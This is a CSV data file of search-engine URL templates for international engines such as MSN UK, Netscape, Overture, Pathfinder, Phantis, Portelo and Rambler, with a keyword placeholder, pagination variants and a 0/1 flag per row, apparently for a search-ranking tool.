"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d97.0(.3)0.1..0.2.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d97.0(.3)0.1..0.2.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d97.0(.3)0.1..0.2.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d2%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 3 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=101&FORM=PERE2","0"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d147.0(.3)0.1..0.3.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d147.0(.3)0.1..0.3.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d147.0(.3)0.1..0.3.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d3%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 4 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=151&FORM=PERE3","0"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d197.0(.3)0.1..0.4.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","1"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d197.0(.3)0.1..0.4.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?ps=ba%3d197.0(.3)0.1..0.4.0.%26co%3d50.4(0.3)200.2.1.10.1.3.%26rd%3d0%26pn%3d4%26&q={SEARCH_KEYWORD}&ck_sc=1&ck_af=1","0"
"International","MSN UK 5 (Next 50)","http://search.msn.co.uk/results.aspx?q={SEARCH_KEYWORD}&first=201&FORM=PERE4","0"
"International","Netscape","http://search.netscape.com/nscp_results.adp?source=NSCPIndex&query={SEARCH_KEYWORD}","1"
"International","Netscape","http://search.netscape.com/ns/search?fromPage=NSCPTop&query={SEARCH_KEYWORD}&x=0&y=0","0"
"International","Netscape","http://search.netscape.com/ns/search?fromPage=NSCPTop&query={SEARCH_KEYWORD}&x=0&y=0","0"
"International","Netscape","http://search.netscape.com/nscp_results.adp?source=NSCPIndex&query={SEARCH_KEYWORD}","0"
"International","Netscape","http://search.netscape.com/nscp_results.adp?source=NSCPIndex&query={SEARCH_KEYWORD}","0"
"International","Netscape","http://search.netscape.com/ns/search?fromPage=NSCPTop&query={SEARCH_KEYWORD}&x=0&y=0","0"
"International","Netscape 2 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=2&offset=0&fromPage=NSCPNextPrev&invocationType=next","1"
"International","Netscape 2 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=2&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 2 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=2&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 2 (Next 15)","http://search.netscape.com/nscp_results.adp?start=16&first=15&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 2 (Next 15)","http://search.netscape.com/nscp_results.adp?start=16&first=15&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 2 (Next 15)","http://search.netscape.com/nscp_results.adp?start=16&first=15&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 3 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=3&offset=0&fromPage=NSCPNextPrev&invocationType=next","1"
"International","Netscape 3 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=3&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 3 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=3&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 3 (Next 15)","http://search.netscape.com/nscp_results.adp?start=31&first=30&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 3 (Next 15)","http://search.netscape.com/nscp_results.adp?start=31&first=30&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 3 (Next 15)","http://search.netscape.com/nscp_results.adp?start=31&first=30&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 4 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=4&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 4 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=4&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 4 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=4&offset=0&fromPage=NSCPNextPrev&invocationType=next","1"
"International","Netscape 4 (Next 15)","http://search.netscape.com/nscp_results.adp?start=46&first=45&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 4 (Next 15)","http://search.netscape.com/nscp_results.adp?start=46&first=45&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 4 (Next 15)","http://search.netscape.com/nscp_results.adp?start=46&first=45&nav=next&query={SEARCH_KEYWORD}&source=NSCPNextPrev","0"
"International","Netscape 5 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=5&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 5 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=5&offset=0&fromPage=NSCPNextPrev&invocationType=next","0"
"International","Netscape 5 (Next 10)","http://search.netscape.com/ns/search?query={SEARCH_KEYWORD}&page=5&offset=0&fromPage=NSCPNextPrev&invocationType=next","1"
"International","Overture","http://srch.overture.com/d/search/p/go/?Partner=go_home&Keywords={SEARCH_KEYWORD}","1"
"International","Overture","http://www.overture.com/d/search/?type=home&mkt=us&lang=en_US&Keywords={SEARCH_KEYWORD}","0"
"International","Overture","http://www.overture.com/d/search/?type=home&mkt=us&lang=en_US&Keywords={SEARCH_KEYWORD}","0"
"International","Overture","http://srch.overture.com/d/search/p/go/?Partner=go_home&Keywords={SEARCH_KEYWORD}","0"
"International","Overture","http://srch.overture.com/d/search/p/go/?Partner=go_home&Keywords={SEARCH_KEYWORD}","0"
"International","Overture","http://www.overture.com/d/search/?type=home&mkt=us&lang=en_US&Keywords={SEARCH_KEYWORD}","0"
"International","Overture 2 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%203%2012&did=","1"
"International","Overture 2 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%203%2012&did=","0"
"International","Overture 2 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%203%2012&did=","0"
"International","Overture 3 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2018%2012&did=","1"
"International","Overture 3 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2018%2012&did=","0"
"International","Overture 3 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2018%2012&did=","0"
"International","Overture 4 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2033%2012&did=","1"
"International","Overture 4 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2033%2012&did=","0"
"International","Overture 4 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2033%2012&did=","0"
"International","Overture 5 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2048%2012&did=","1"
"International","Overture 5 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2048%2012&did=","0"
"International","Overture 5 (Next 15)","http://srch.overture.com/d/search/p/go/?Keywords={SEARCH_KEYWORD}&view=2%2048%2012&did=","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","Oznetwork Au","http://www.oznetwork.com.au/webapp/search/world.cgi?search={SEARCH_KEYWORD}","0"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","1"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","0"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","0"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","0"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","0"
"International","pathfinder","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}","0"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","1"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","0"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","0"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","0"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","0"
"International","pathfinder1(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=2","1"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","1"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","0"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","0"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","0"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","0"
"International","pathfinder10(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=11","0"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","1"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","0"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","0"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","0"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","0"
"International","pathfinder11NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=12","0"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","1"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","0"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","0"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","0"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","0"
"International","pathfinder12NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=13","0"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","1"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","0"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","0"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","0"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","0"
"International","pathfinder13NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=14","0"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","1"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","0"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","0"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","0"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","0"
"International","pathfinder14NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=15","0"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","1"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","0"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","0"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","0"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","0"
"International","pathfinder15NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=16","0"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","1"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","0"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","0"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","0"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","0"
"International","pathfinder2(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=3","0"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","1"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","0"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","0"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","0"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","0"
"International","pathfinder3(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=4","0"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","1"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","0"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","0"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","0"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","0"
"International","pathfinder4(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=5","0"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","1"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","0"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","0"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","0"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","0"
"International","pathfinder5(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=6","0"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","1"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","0"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","0"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","0"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","0"
"International","pathfinder6(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=7","0"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","1"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","0"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","0"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","0"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","0"
"International","pathfinder7(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=8","0"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","1"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","0"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","0"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","0"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","0"
"International","pathfinder8(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=9","0"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","1"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","0"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","0"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","0"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","0"
"International","pathfinder9(NEXT 10)","http://search.pathfinder.gr/search?q={SEARCH_KEYWORD}&tab=web&page=10","0"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","1"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","0"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","0"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","0"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","0"
"International","Phantis","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=0","0"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","1"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","0"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","0"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","0"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","0"
"International","Phantis1(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=1","0"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","1"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","0"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","0"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","0"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","0"
"International","Phantis2(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=2","0"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","1"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","0"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","0"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","0"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","0"
"International","Phantis3(Next 100)","http://world.phantis.com/spade.get?q={SEARCH_KEYWORD}&cs=iso8859-7&ps=100&fm=off&np=3","0"
"International","Portelo IL","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}","1"
"International","Portelo IL","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}","0"
"International","Portelo IL","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}","0"
"International","Portelo IL 2 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=2&ct=","1"
"International","Portelo IL 2 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=2&ct=","0"
"International","Portelo IL 2 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=2&ct=","0"
"International","Portelo IL 3 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=3&ct=","1"
"International","Portelo IL 3 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=3&ct=","0"
"International","Portelo IL 3 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=3&ct=","0"
"International","Portelo IL 4 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=4&ct=","1"
"International","Portelo IL 4 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=4&ct=","0"
"International","Portelo IL 4 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=4&ct=","0"
"International","Portelo IL 5 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=5&ct=","1"
"International","Portelo IL 5 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=5&ct=","0"
"International","Portelo IL 5 (Next 10)","http://www.portelo.co.il/main/search.asp?key={SEARCH_KEYWORD}&flag=5&ct=","0"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","1"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","0"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","0"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","0"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","0"
"International","Rambler","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&where=1","0"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","1"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","0"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","0"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","0"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","0"
"International","Rambler 2 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=16","0"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","1"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","0"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","0"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","0"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","0"
"International","Rambler 3 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=31","0"
"International","Rambler 4 (Next 15)","http://search.rambler.ru/cgi-bin/rambler_search?words={SEARCH_KEYWORD}&start=46","1"
